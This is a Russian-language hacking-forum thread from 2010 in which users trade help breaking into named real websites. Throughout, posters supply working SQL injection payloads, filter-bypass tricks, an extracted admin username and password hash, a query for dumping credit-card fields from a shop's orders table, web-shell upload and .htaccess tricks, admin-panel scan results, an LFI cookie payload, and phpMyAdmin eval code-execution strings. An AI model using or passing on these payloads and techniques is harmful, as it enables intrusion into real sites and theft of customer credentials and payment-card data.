' union select 1,count(*),3 from student group by concat(version(),(select studentid from student limit 1),rand(0))/*нет.

Так вот вопрос)
1) Почему на 4 версии иногда прокатывает с rand(0), а на 5, сколько не пытался, так и не получилось
2) Почему с floor(rand(0)*2) прокатывает всегда, а с теми же rand(0)|0 работает только на 5 версии
3) Почему вот такой запрос не выдает ошибку, не смотря на то что там floor(rand(0)*2)
' and (1) = (select count(*) from student group by floor(rand(0)*2))/*

1) На 5, работает практически так же, как и на 4, попадется пример, скину в пм.
2) Самый вероятный вариант, это то, что в 4 версии, символ "|" интерпретируется иначе.
3) По поводу почему у тебя выдает ошибку в случаях, когда её быть не должно. Я полагаю, в union select у тебя идет объединение колонки studentid, которая уже используется в запросе, в результате чего union со своим свойством делейт-дубликат конфликтует и возвращает false в массив, По сути потому что у тебя идёт повторная выборка. Как-то так :)

EoGeneo
15.06.2010, 11:17
Подскажите. есть ли тут скуля ?
http://www.territory.ru/info/news/index.php?show=news&id=-2984

Irdis
15.06.2010, 12:16
Подскажите. есть ли тут скуля ?
в параметрах show=news&id=-2984 точно нет.

exT1ma4ka
15.06.2010, 13:41
подскажите пожалуйста как залить шелл.

ситуация такая: mysql стоит на одной машинке, сайт на другой (хостинг) - есть sql-inj дырка. INTO OUTFILE применить не получится исходя из выше-сказанного (mysql на отдельной машине).

по крайней мере пытался, но пишет:

Error 1: Can't create/write to file '/var/www/пам/data/www/парам/uploads/shell.php' (Errcode: 2)
актуально )

Konqi
15.06.2010, 13:43
актуально )


залей шелл в папку /tmp , и ищи инклуд на сайте

qq6ka
15.06.2010, 13:46
Есть сайт с именем третьего уровня sub.domain.com
Этот сайт на инъекцию реагирует ошибкой "E:\inetpub\wwwroot\___\___\index.php" и север показывает Microsoft-IIS/7.5
Но ОС, показываемая инъекцией - REDHAT-LINUX-GNU, я могу читать/etc/passwd и пр.

У головняка второго уровня (domain.com) ИП отличается от первого. Сервер Apache/2.2.3 (Red Hat). Его файлы я, видимо, и читаю.

И что-то я нихрена не пойму как это устроено. Может кто объяснить?

exT1ma4ka
15.06.2010, 13:49
в /tmp/ тоже не льёт. в любые сайтовые пути не льёт. зато, например, C:\SQL - спокойно заливает. или любой другой виндовский путь, а всё потому что Mysql на винде, а сайт на линуксе. что делать в таком случае ?

EoGeneo
15.06.2010, 13:50
Есть сайт с именем третьего уровня sub.domain.com
Этот сайт на инъекцию реагирует ошибкой "E:\inetpub\wwwroot\___\___\index.php" и север показывает Microsoft-IIS/7.5
Но ОС, показываемая инъекцией - REDHAT-LINUX-GNU, я могу читать/etc/passwd и пр.

У головняка второго уровня (domain.com) ИП отличается от первого. Сервер Apache/2.2.3 (Red Hat). Его файлы я, видимо, и читаю.

И что-то я нихрена не пойму как это устроено. Может кто объяснить?

Видимо на хосте поддоменость работает в таком виде.
sub.domain.com => domain.com/sub

qq6ka
15.06.2010, 13:51
Видимо на хосте поддоменость работает в таком виде.
sub.domain.com => domain.com/sub

а "E:\inetpub\wwwroot\___\___\index.php" и север показывает Microsoft-IIS/7.5 как объяснить в таком случае? И разные ИП?

DrakonHaSh
15.06.2010, 14:14
qq6ka
Mysql_connect($HostOnOtherMachine, $Username, $Password)

qq6ka
15.06.2010, 14:16
qq6ka
Mysql_connect($HostOnOtherMachine, $Username, $Password)

Уже понял. Отдыхать нужно от компа мне побольше...

DrakonSerg
15.06.2010, 15:24
некоторые программы для автомат раскрутки sql уязвимостей (например PAngolin) для работы требуют keyword. Как его можно узнать?

wildshaman
15.06.2010, 15:34
некоторые программы для автомат раскрутки sql уязвимостей (например PAngolin) для работы требуют keyword. Как его можно узнать?
Многие программы сами могут искать кей (сипт, например).
А так, лейворд - слово\фраза, которая присутствует\отсутствует во время раскрутки инъекции.
К примеру, перебираем колонки. Без скули на странице есть какой-то текст При переборе числа колонок текст пропадает, при подборе нужного числа - снова появляется. Фраза из текста и будет кейвордом.
Ну или при +order+by+999 есть ошибка, при +order+by+1 ошибки нет, значит слово из еррора и будет кейвордом

InfectedM
15.06.2010, 15:43
Есть вебшел.
почему не грузятся большие файлы 10мб+ на хост?
Есть какие-либо способы распоковать zip файл если не на хостинге не стоит gzip?
скачал pclzip.lib.php ,можно просматривать содержимое zip архивов, пишет что распоковал ,но файлы не появляются :(

Думаю может места нет на диске просто , можно как-нить узнать сколько осталось места ?
шелл показывает только общий объем жестака 1 тб :(

DrakonSerg
15.06.2010, 16:02
Многие программы сами могут искать кей (сипт, например).
А так, лейворд - слово\фраза, которая присутствует\отсутствует во время раскрутки инъекции.
К примеру, перебираем колонки. Без скули на странице есть какой-то текст При переборе числа колонок текст пропадает, при подборе нужного числа - снова появляется. Фраза из текста и будет кейвордом.
Ну или при +order+by+999 есть ошибка, при +order+by+1 ошибки нет, значит слово из еррора и будет кейвордом
спасибо, очень доступно объяснил. Не подскажешь, есть ли где нибудь в сети более менее понятная инструкция по sipt 4. Я его не могу никак одолеть. Говорят он неплохо брутит (блинд инъекции), а это именно то, что мне бы очень помогло.

wildshaman
15.06.2010, 16:03
Не грузятся через шелл? Значит в php.ini стоит значение upload_max_filesize=10M
оно ограничивает максимальный размер загружаемого файла.
Свбодное место шелл точно показывает верно ;)
по поводу класса - там есть параметр, указывающий, куда будет извлекаться содержимое
$list = $archive->extract(PCLZIP_OPT_PATH, "extract/folder/");
(из мана)


спасибо, очень доступно объяснил. Не подскажешь, есть ли где нибудь в сети более менее понятная инструкция по sipt 4. Я его не могу никак одолеть. Говорят он неплохо брутит (блинд инъекции), а это именно то, что мне бы очень помогло.
https://forum.antichat.ru/thread40545.html
Ждя версии 3.0

manerus
15.06.2010, 17:39
при выводе столбцов http://site.ru/news.php?id=34+union+select+1,2,3,table_name,5+fro m+information_schema.tables+limit+11,1--

выводяться не те столбцы который бы хотелось и при выводе таблиц из столбоцов выдёргиваюсть совсем не то что надо как мне постоваить запрос что бы вывелись user, admin и т.д.?

Bb0y
15.06.2010, 17:43
2manerus, попробуй использовать ф-ю group_concat():...+1,2,3,group_concat(0x0b,table_n ame),5+from+information_schema.Tables+--
выведет, сколько позволит ограничение выводимых данных
з.Ы. Этих таблиц вполне может и не быть

Konqi
15.06.2010, 23:28
ребят таблица админа находится в другой базе, a в имени этой базы есть символ -

и при подстановке запроса select from xxx-xxx.admin

сервер ругается на этот символ..Как можно обoйти?

.:[melkiy]:.
15.06.2010, 23:57
ребят таблица админа находится в другой базе, a в имени этой базы есть символ -

и при подстановке запроса select from xxx-xxx.admin

сервер ругается на этот символ..Как можно обoйти?

`xxx-xxx`.`table`

Konqi
16.06.2010, 00:02
:.']`xxx-xxx`.`table`

спасибо, помог :)

Ctacok
16.06.2010, 08:54
/usr/local/www/new/

BlackFan
16.06.2010, 11:03
Нашел LFI в SmallNuke

common.php
if ((!isset ($_SESSION['snss_lang'])) AND (isset($_COOKIE['snss_lang']))) {
session_register ("snss_lang");
$_SESSION['snss_lang'] = $conf['default_lang'];
if ($_COOKIE['snss_lang'] != "") {
$_SESSION['snss_lang'] = $_COOKIE['snss_lang'];
} else {
$_SESSION['snss_lang'] = $conf['default_lang'];
}
}
define ('_SNSS_LANG',''.$_SESSION['snss_lang'].'');
index.php
include (SN_PathRoot.'inc/common.php');

if (file_exists (SN_PathRoot.'lang/lang-'._SNSS_LANG.'.php')) {
include_once (SN_PathRoot.'lang/lang-'._SNSS_LANG.'.php');
} else {
eror ("Eror! Lang file is absent");
exit;
}

У себя тестировал, например, куки snss_lang = /../../robots.txt%00 отлично инключится.

Пробую на реальном сайте (http://www.bifilife.ru/index.php)
ru.php%00 и en.php%00 работают, а вот за пределы lang никак не получается вылезти.
Что именно не так делаю?) (пробовал на нескольких)

manerus
16.06.2010, 11:48
помогите подобрать таблицы не как не могу найти даже с помощью SQLIHelperV.2.7 не чего не находит(
версия 4.1.22-standard
сразу скажу что это шоп.
пробовал подбирать в ручную но тчетно.

могу в пм кинуть линк кто сможет мне объеснить!

wildshaman
16.06.2010, 12:01
В четвертой версии таблицы только брутить.
SIPT умеет, Toolza тоже умеет.

jecka3000
16.06.2010, 13:21
помогите найти админку _http://www.aaptnet.org/home/

Konqi
16.06.2010, 13:48
помогите найти админку _http://www.aaptnet.org/home/

http://www.aaptnet.org/cms/
http://www.aaptnet.org/members/

(403) ((

Gorev
16.06.2010, 13:59
помогите найти админку _http://www.aaptnet.org/home/


http://aaptnet.org/.htaccess 403 Forbidden
http://aaptnet.org/.htconfig 403 Forbidden
http://aaptnet.org/.htpasswd 403 Forbidden
http://aaptnet.org/education 301 Moved Permanently
http://aaptnet.org/cgi.cgi 403 Forbidden
http://aaptnet.org/cms 301 Moved Permanently
http://aaptnet.org/css 301 Moved Permanently
http://aaptnet.org/favicon.ico HTTP 200 OK
http://aaptnet.org/img 301 Moved Permanently
http://aaptnet.org/index.php 302 Found
http://aaptnet.org/index.py 403 Forbidden
http://aaptnet.org/login.php 401 Internal Server Error
http://aaptnet.org/manager 301 Moved Permanently
http://aaptnet.org/news 301 Moved Permanently
http://aaptnet.org/picture_library 301 Moved Permanently
http://aaptnet.org/quikstore.cgi 403 Forbidden
http://aaptnet.org/resources 301 Moved Permanently
http://aaptnet.org/test 301 Moved Permanently
http://aaptnet.org/web_store.cgi 403 Forbidden
http://aaptnet.org/home 301 Moved Permanently
http://aaptnet.org/members 301 Moved Permanently
http://aaptnet.org/server-status 403 Forbidden
http://aaptnet.org/.htaccess~ 403 Forbidden
http://aaptnet.org/.htpasswd~ 403 Forbidden

jecka3000
16.06.2010, 14:27
пробую залить шелл http://www.pogoda.ua/index.php?id=-4+union+select+1,file_priv,3,4,5+from+mysql.user--
ничего не получается, есть поле users c test;test, http://www.pogoda.ua/admin тож ничего не происходит...есть вообще какие варианты попасть в админку или залить шелл?)

durito
16.06.2010, 14:28
хитромудрая скуль и походу тут не mysql

http://www.collegedates.com/selectschool/?section=signup&schoolid=731+and+1=1&sid=

помогите с советом

wildshaman
16.06.2010, 14:38
Обычная скуля, 4 колонки, без вывода
http://www.collegedates.com/selectschool/?section=signup&schoolid=731+union+select+111,222,333,444+--+&sid=

.Slip
16.06.2010, 14:42
хитромудрая скуль и походу тут не mysql

http://www.collegedates.com/selectschool/?section=signup&schoolid=731+and+1=1&sid=

помогите с советом
mysql 5й ветки, слепая инъекция.

>> помогите советом
Советую почитать статьи.

Tigger
16.06.2010, 14:45
хитромудрая скуль и походу тут не mysql

http://www.collegedates.com/selectschool/?section=signup&schoolid=731+and+1=1&sid=

помогите с советом


http://www.collegedates.com/selectschool/?section=signup&schoolid=731+union+select+1,2,3,4--+

Как бы там blind

manerus
16.06.2010, 14:53
В четвертой версии таблицы только брутить.
SIPT умеет, Toolza тоже умеет.

к сожелению он тоже не помог((

v1d0qz
16.06.2010, 14:58
Делаем несколько магических движений, а потом "ТУПО" заламываемся в админку без пароля http://www.collegedates.com/admin/

pinch
16.06.2010, 16:38
http://www.collegedates.com/selectschool/?section=signup&schoolid=99999+union+select+1,2,table_name,4+from+ information_schema.tables+limit+15,1--

где тут blind емае

~d0s~
16.06.2010, 16:54
Есть админскии логин и пароль _http://lp.pesgame.net g@l@g@n:7C6aizlP
Есть скуля _http://lp.pesgame.net/index.php?cmd=table&lid=14'
Есть функции залива аватарки,пробывал залить шелл нефига не вышло.Может у кого-то выйдет,заплюсую до смерти +5wmz .

Gorev
16.06.2010, 17:21
http://www.infotula.ru/forum/ прошу помочь определить движок форума...

manerus
16.06.2010, 17:28
http://www.infotula.ru/forum/ прошу помочь определить движок форума...

вроде самописный

Op3r
16.06.2010, 18:49
посоветуйте как вывести данные по следующим колонкам id, name, password
_http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+column_name,2+from+INFORMATION_SCH EMA.COLUMNS+where+table_name=0x41444D494E555345525 3+limit+0,4--

Gorev
16.06.2010, 19:13
посоветуйте как вывести данные по следующим колонкам id, name, password
_http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+column_name,2+from+INFORMATION_SCH EMA.COLUMNS+where+table_name=0x41444D494E555345525 3+limit+0,4--
442393_oasisoftheseas_data.adminUsers
zach:*7BBC795B807CB505967BF8A5CEFF0945E8897D6A

Op3r
16.06.2010, 20:44
Gorev с этого момента поподробнее, с помощью какого запроса Вы получили данные?

Konqi
16.06.2010, 20:52
http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+password,2+from+442393_oasisofthes eas_data.adminUsers

:)

wildshaman
16.06.2010, 21:06
http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+concat_ws(0x3a,id,name,password),2 +from+adminUsers+--+

manerus
16.06.2010, 22:57
http://www.site.com/info.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

скуля есть, поля нашёл но при определение выводимых столбцов union select выдаёт

Forbidden
You don't have permission to access /info.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


з.ы. это шоп c ювелиркой, кто поможет и объеснит c меня + и линк!

Konqi
16.06.2010, 22:59
http://www.site.com/info.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

скуля есть, поля нашёл но при определение выводимых столбцов union select выдаёт

Forbidden
You don't have permission to access /info.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


з.ы. это шоп c ювелиркой, кто поможет и объеснит c меня + и линк!

стоит фильтр, попробуй так /!*union*/+/!*select*/

.:[melkiy]:.
16.06.2010, 23:04
стоит фильтр, попробуй так /!*union*/+/!*select*/
or
union%0aselect :)

wildshaman
16.06.2010, 23:14
или
/*!UnIoN+SeLeCt*/
UnIoN/**/SeLeCt

CyberHunter
16.06.2010, 23:16
Вот нашел на хакер.ру уязвимость:
SQL-инъекция в MODx
Программа: MODx 1.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" сценарием manager/index.php (когда "a" установлен в "16") перед использованием в SQL запросах в manager/actions/mutate_templates.dynamic.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит: http://host/manager/index.php?id=4%27+ANY_SQL&a=16
Помогите скулю раскрутить, а то что-то не получается.
Вот пример сайта на этой CMS: http://bobsguides.com/manager/index.php?id=4&a=16

pinch
16.06.2010, 23:31
мэн там нету скули

manerus
16.06.2010, 23:31
или
/*!UnIoN+SeLeCt*/
UnIoN/**/SeLeCt


респект
/*!UnIoN+SeLeCt*/)) лови +

pinch
16.06.2010, 23:33
респект /*!UnIoN+SeLeCt*/)) лови +

думаю скоро он опять появится...
т.к. дальше наверно тож будет фильтр

CyberHunter
16.06.2010, 23:34
мэн там нету скули
На хакер.ру ошиблись? Или сайт для примера с закрытой дыркой?

wildshaman
16.06.2010, 23:36
Может, дашь акк тестовый? Ибо без логина там и крутить нечего

BlackFan
16.06.2010, 23:56
На хакер.ру ошиблись? Или сайт для примера с закрытой дыркой?
Инъекция есть...
Но чтобы ее использовать надо как минимум
1) доступ в админку
2) magic_quotes = Off

mutate_templates.dynamic.php
if ($_REQUEST['a'] == 16) {
$sql = "SELECT tv.name as 'name', tv.id as 'id', tr.templateid, tr.rank, if(isnull(cat.category),'".$_lang['no_category']."',cat.category) as category
FROM ".$modx->getFullTableName('site_tmplvar_templates')." tr
INNER JOIN ".$modx->getFullTableName('site_tmplvars')." tv ON tv.id = tr.tmplvarid
LEFT JOIN ".$modx->getFullTableName('categories')." cat ON tv.category = cat.id
WHERE tr.templateid='".$_REQUEST['id']."' ORDER BY tr.rank ASC";

$rs = $modx->db->query($sql);

manerus
17.06.2010, 01:33
вот что получилось
http://www.site.com/info.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,/*!concat*/(column_name)+/*!from*/+/*!information_schema*/./*!columns*/+/*!where*/+/*!table_name*/=0x6f7264657273+limit+36,1--

выдрал данные из таблицы orders выдралось cc_type, cc_number, cc_owner, cc_expires, cvv нету походу, теперь как получить эти самые данные сс?

зы голова не соображает ладно "утро вечера мудренее"

f1ng3r
17.06.2010, 02:17
вот что получилось
http://www.site.com/info.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,/*!concat*/(column_name)+/*!from*/+/*!information_schema*/./*!columns*/+/*!where*/+/*!table_name*/=0x6f7264657273+limit+36,1--

выдрал данные из таблицы orders выдралось cc_type, cc_number, cc_owner, cc_expires, cvv нету походу, теперь как получить эти самые данные сс?

зы голова не соображает ладно "утро вечера мудренее"

concat_ws (0x3a,cc_type,cc_number,cc_owner,cc_expires) from orders

wildshaman
17.06.2010, 02:21
http://www.site.com/info.php?id=-1+/*!UnIoN+SeLeCt+concat_ws(0x3a,cc_type,cc_number,cc _owner,cc_expires),2,3,4+from+orders+limit+0,1*/+--+


Если принтабельна первая колонка
И не извращайся с псевдокомментами, хватит одного для обхода WAF

pinch
17.06.2010, 16:12
хотел бы спросить. как нибудь можно вызвать ошибки на сайте чтоб узнать полный путь. если сайт на ASP

Ctacok
17.06.2010, 16:35
хотел бы спросить. как нибудь можно вызвать ошибки на сайте чтоб узнать полный путь. если сайт на ASP
https://forum.antichat.ru/threadnav31427-1-10.html

jecka3000
17.06.2010, 17:21
http://www.fragrance.org/

помогите найти админку))

директория phpmyadmin и members не интересует=)

wildshaman
17.06.2010, 17:37
Ну и зря не интересует, в pma версиях ниже 2.11.9 есть замечательный баг с исполнением php кода
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/

Ctacok
17.06.2010, 18:01
Ну и зря не интересует, в pma версиях ниже 2.11.9 есть замечательный баг с исполнением php кода
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
mq=on, неполучится.

Pashkela
17.06.2010, 19:00
mq=on, неполучится.

ммммм, а какая связь между этим сплойтом и маджиками, процтите?)

BlackFan
17.06.2010, 19:02
http://www.fragrance.org/

помогите найти админку))

директория phpmyadmin и members не интересует=)
http://fragrance.org/ControlPanel/

вроде вот она..

Ctacok
17.06.2010, 19:21
ммммм, а какая связь между этим сплойтом и маджиками, процтите?)
А ты посмотри ^_^
Там кароче бага в чём, надо закрыть ковычку, и дописать свой код, а т.к. ковычка экранируется, нечего не получится. Ну на словах я Лев толстой, а на деле ... простой. Покажу.

И так.
Есть у нас создание конфига, там вписать можно небольшое количество параметров.
Вообще без разницы куда вписывать, но лучше в host.
Если мы пишем хост: localhost, то в конфиге.
$host = 'localhost';
А нам же надо закрыть ковычку. Мы пишем значит, localhost'; eval($_GET[c]); //
И получается нечто вроде:
$host = 'localhost\';eval($_GET); // Э, куда ковычки деются? ПАШКЕЛЛА ПОХЕКАЛ МОЙ ПОСТ!

$host = 'localhost\';eval($_GET[c]); //

Сам догадаешься причём там mq ?

Или ты мне хочешь показать особые условия? :)

pinch
17.06.2010, 19:34
привет всем, есть одна проблема. Суть: Есть админка. Могу загружать файлы любых типов. Скрипты, doc, pdf, всякие идут в папку files, изображения в папку gallery. Но в папке files запрещены выполнение скриптов=(((. Что делать, посоветуйте пожалуйста...

Ctacok
17.06.2010, 19:40
привет всем, есть одна проблема. Суть: Есть админка. Могу загружать файлы любых типов. Скрипты, doc, pdf, всякие идут в папку files, изображения в папку gallery. Но в папке files запрещены выполнение скриптов=(((. Что делать, посоветуйте пожалуйста...
.htaccess залить,
AddHandler application/x-httpd-php .php

// Значит не судьба

pinch
17.06.2010, 19:41
нет пробовал грит "файл с таким именем уже есть!"

m0Hze
17.06.2010, 19:45
А ты посмотри ^_^
Там кароче бага в чём, надо закрыть ковычку, и дописать свой код, а т.к. ковычка экранируется, нечего не получится. Ну на словах я Лев толстой, а на деле ... простой. Покажу.

И так.
Есть у нас создание конфига, там вписать можно небольшое количество параметров.
Вообще без разницы куда вписывать, но лучше в host.
Если мы пишем хост: localhost, то в конфиге.
$host = 'localhost';
А нам же надо закрыть ковычку. Мы пишем значит, localhost'; eval($_GET[c]); //
И получается нечто вроде:
$host = 'localhost\';eval($_GET); // Э, куда ковычки деются? ПАШКЕЛЛА ПОХЕКАЛ МОЙ ПОСТ!



Сам догадаешься причём там mq ?

Или ты мне хочешь показать особые условия? :)
Я не вникал в тему, но разве нельзя использовать {}?
Что-то вроде:

<?php
$sting = ${@eval($_REQUEST[c])};
?>

Конечно, если я правильно, и речь идет о pma code exec. У меня спокойно срабатывал такой вариант, ведь там помоему используется preg_replace, второй аргумент которого находится в двойных кавычках, что дает нам право на подстановку иполняемых данных. Опять же, если я правильно въехал.
//upd. Все верно, кавычки там идут лесом, вполне срабатывает такой запрос:

/phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by={${die(phpinfo())}}&sort_order=desc&token=1957

m0Hze
17.06.2010, 19:48
нет пробовал грит "файл с таким именем уже есть!"
В таком случае, поищи в админке LFI, очень часто именно в админской части сайта меньше всего защиты от атак. Достаточно часто сталкивался с таким способом заливки, когда льется только картинка, и хтаццесс не залить, то лил картинку набитую кодом шелла, и инклудил в админке.

wildshaman
17.06.2010, 19:55
если в хтацессе прописаны запрещенные разрешения, то тести
php phps php3 php5 phtml phps pht

Ctacok
17.06.2010, 20:03
Я не вникал в тему, но разве нельзя использовать {}?
Что-то вроде:

<?php
$sting = ${@eval($_REQUEST[c])};
?>

Конечно, если я правильно, и речь идет о pma code exec. У меня спокойно срабатывал такой вариант, ведь там помоему используется preg_replace, второй аргумент которого находится в двойных кавычках, что дает нам право на подстановку иполняемых данных. Опять же, если я правильно въехал.
//upd. Все верно, кавычки там идут лесом, вполне срабатывает такой запрос:

/phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by={${die(phpinfo())}}&sort_order=desc&token=1957

Э, я про /scripts/setup.php, я другую багу имел ввиду.

pinch
17.06.2010, 20:04
LFI на сайте и админке нигде нету, тестил расширения реультат 0 .....=((

Pashkela
17.06.2010, 23:57
Э, я про /scripts/setup.php, я другую багу имел ввиду.


Ну типо ми тоже про /scripts/setup.php. На проверь:


http://www.melancholy.ru/phpmyadmin/scripts/setup.php

и объясни мне все таки, юзал ли ты хоть раз этот сплойт и почему в данном случае (как и во всех других) он прекрасно работает и при magic_quotes=on

Если мы вообще говорим об одном и том же сплойте:

http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/

про который вообще-то изначально писал wildshaman

CyberHunter
18.06.2010, 00:15
http://www.lighterlifecommunity.co.uk/e107_plugins/userjournals_menu/userjournals.php?blog.-2719+union+select+1,2,@@version,4,5,6,7,8,9,10,11, 12,13+--+
5.0.81-log


А почему не работают обычные функции? Как например вывести данные из бд?

Или вот другой пример:

http://www.salvationprophecy.com/e107_plugins/userjournals_menu/userjournals.php?blog.-43++union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+

там даже @@version не работает.

Ctacok
18.06.2010, 07:09
Ну типо ми тоже про /scripts/setup.php. На проверь:

http://www.melancholy.ru/phpmyadmin/scripts/setup.php

и объясни мне все таки, юзал ли ты хоть раз этот сплойт и почему в данном случае (как и во всех других) он прекрасно работает и при magic_quotes=on
Если мы вообще говорим об одном и том же сплойте:
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
про который вообще-то изначально писал wildshaman


Да причём сплойт, ты на саму багу посмотри, как ты закроешь открытую ковычку?

EoGeneo
18.06.2010, 11:52
Скажу прямо...как узнать по имени домена где находится панель управления хостингом.

Может у вас есть варианты...всё перерыл ничего не нашел. кудато попал...но там ни данных подключения ничего нет...прсото написано, что у вас есть хостинг и всё )

Ctacok
18.06.2010, 11:58
whois -> dns.

ну там далее пробьёшь хостера, у хостера спросишь адрес панели.

EoGeneo
18.06.2010, 12:45
whois -> dns.
ну там далее пробьёшь хостера, у хостера спросишь адрес панели.


Ага, спасибо так и сделал, хостер сказал что у вас домен резолвится на VPS а впс не наш. вобщем я нашел этот впс, нашел ссылки до phpmyadmin и ispmanagera....есть много инофрмации о хозяине. но не знаю что дальше делать....тупик.

Хотел восстановить на мыло пасы от ISP так оказывается нет такой функции...

DrakonHaSh
18.06.2010, 13:56
про /scripts/setup.php


Да причём сплойт, ты на саму багу посмотри, как ты закроешь открытую ковычку?


я так и не понял, что ты имел в виду.

если ты про код, который берется с ftp, то никаких там проблем с кавычками нет, сейчас протестил:






=>

1

'x'

/pma/scripts/setup.php

кстати, если бы "проблемы" с кавычками были бы, то их легко можно было бы решить при помощи, например, eval(base64_decode(blalba))) ]

кста,

вариант с кодом на ftp не работает при allow_url_fopen = Off

Konqi
18.06.2010, 14:01
про /scripts/setup.php
вариант с кодом на ftp не работает при allow_url_fopen = Off


но насколько помню по дефолту ulr_fopen=On

manerus
18.06.2010, 16:20
помогите найти столбцы, брут не помог

Version: 4.0.26-nt


http://www.brew-monkey.com/brewschool/hop.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26--

Gorev
18.06.2010, 16:23
помогите найти столбцы, брут не помог
Version: 4.0.26-nt

http://www.brew-monkey.com/brewschool/hop.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26--



и что ты ожидаешь? что у кого то есть паранормальный брут который прям угадает столбцы?сам делай словарь и бруть по нему...

попробуй прочитать файлы на сервере, c:/boot.ini

Pashkela
18.06.2010, 16:23
помогите найти столбцы, брут не помог
Version: 4.0.26-nt

http://www.brew-monkey.com/brewschool/hop.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26--



попробуй в эту сторону глянуть, у них там этот форум:

http://forum.snitz.com/

бесплатный, скачай и посмотри таблицы/колонки

DrakonHaSh
18.06.2010, 17:16
Я не вникал в тему, но разве нельзя использовать {}?
Что-то вроде:





Конечно, если я правильно, и речь идет о pma code exec. У меня спокойно срабатывал такой вариант, ведь там помоему используется preg_replace, второй аргумент которого находится в двойных кавычках, что дает нам право на подстановку иполняемых данных. Опять же, если я правильно въехал.
//upd. Все верно, кавычки там идут лесом, вполне срабатывает такой запрос:

/phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by={${die(phpinfo())}}&sort_order=desc&token=1957



а можно рабочий пример где это потестить можно ?

или хотя бы версию pma и mysql

бо у себя пробовал на localhost, phpMyAdmin-2.10.2, 5.1.40-community - не фига не выходит

ps:

здесь: /threadnav46016-340-10.html

и здесь: /threadnav50669-1-40-phpMyAdmin.html все прочел

jecka3000
18.06.2010, 20:11
http://www.tullamorechamber.com/

хелп, где тут алминка?

Pashkela
18.06.2010, 20:24
http://tullamorechamber.com/Adm/MyLogin.php?Page=/Adm/

FlaktW
18.06.2010, 23:27
Не могу попасть в админку.

http://alvand.basu.ac.ir/~flora/family.php?id=29+and+(select*from(select+count(*)f rom(select+1+union+select+2+union+select+3)x+group +by+concat(mid((select+concat_ws(0x3a,Id,

user_name,

password)+from+users+limit+0,1),1,64),floor(rand(0 )*2)))z)+--+

Id,

user_name,

password

http://alvand.basu.ac.ir/login.php

aa:ss

a:a

InfectedM
19.06.2010, 04:51
есть доступ к админке каторая правит странички.

добавляю

Но выводит почему-то как html :

2

почему такая шляпа?

Ctacok
19.06.2010, 07:22
есть доступ к админке каторая правит странички.
добавляю
Но выводит почему-то как html
:

2

почему такая шляпа?


Потому что страничка небойсь в mysql идёт?

Из mysql, знаешь ли не интерпретируется код..


про /scripts/setup.php
я так и не понял, что ты имел в виду.
если ты про код, который берется с ftp, то никаких там проблем с кавычками нет, сейчас протестил:





=>
1
'x'
/pma/scripts/setup.php
кстати, если бы "проблемы" с кавычками были бы, то их легко можно было бы решить при помощи, например, eval(base64_decode(blalba))) ]
кста,
вариант с кодом на ftp не работает при allow_url_fopen = Off


Вы вообще читать умеете, я про ту багу, которую я описал пару страничек назад?

k2b1~
19.06.2010, 09:23
помояите наыти админку

поjaлуста

http://www.ycap.am/

i

http://piccolino.am/

Ctacok
19.06.2010, 09:28
/controlpanel/

У обоих, но это хостинг, пробуй мб войдёшь.

k2b1~
19.06.2010, 09:30
da eto cPanel//

a mne admin panel

GIG
19.06.2010, 10:14
da eto cPanel//
a mne admin panel


Кравлером проходил ? Если да , то вариантов поиска я более не вижу.

BlackFan
19.06.2010, 12:16
помояите наыти админку
поjaлуста
http://www.ycap.am/
i
http://piccolino.am/


http://www.ycap.am/admin/adminlogin.php

http://piccolino.am/cms/login.php

DrakonHaSh
19.06.2010, 14:09
Вы вообще читать умеете, я про ту багу, которую я описал пару страничек назад?


канэчна рядовой [на кэпа, чисто по званию, сие изречения как-то не тянет ]

17.06.2010, 18:01 Ctacok (https://antichat.live/showpost.php/p/2210154/postcount/13913/)



Ну и зря не интересует, в pma версиях ниже 2.11.9 есть замечательный баг с исполнением php кода
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/


mq=on, неполучится.


" if author else f"


Ну и зря не интересует, в pma версиях ниже 2.11.9 есть замечательный баг с исполнением php кода
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/


mq=on, неполучится.


17.06.2010, 19:21 Ctacok (https://antichat.live/showpost.php/p/2210282/postcount/13916/)

Цитата:



ммммм, а какая связь между этим сплойтом и маджиками, процтите?)


А ты посмотри ^_^
Там кароче бага
в чём, надо закрыть ковычку, и дописать свой код, а т.к. ковычка экранируется, нечего не получится. Ну на словах я Лев толстой, а на деле ... простой. Покажу.


" if author else f"


ммммм, а какая связь между этим сплойтом и маджиками, процтите?)


А ты посмотри ^_^
Там кароче бага
в чём, надо закрыть ковычку, и дописать свой код, а т.к. ковычка экранируется, нечего не получится. Ну на словах я Лев толстой, а на деле ... простой. Покажу.


где там ?

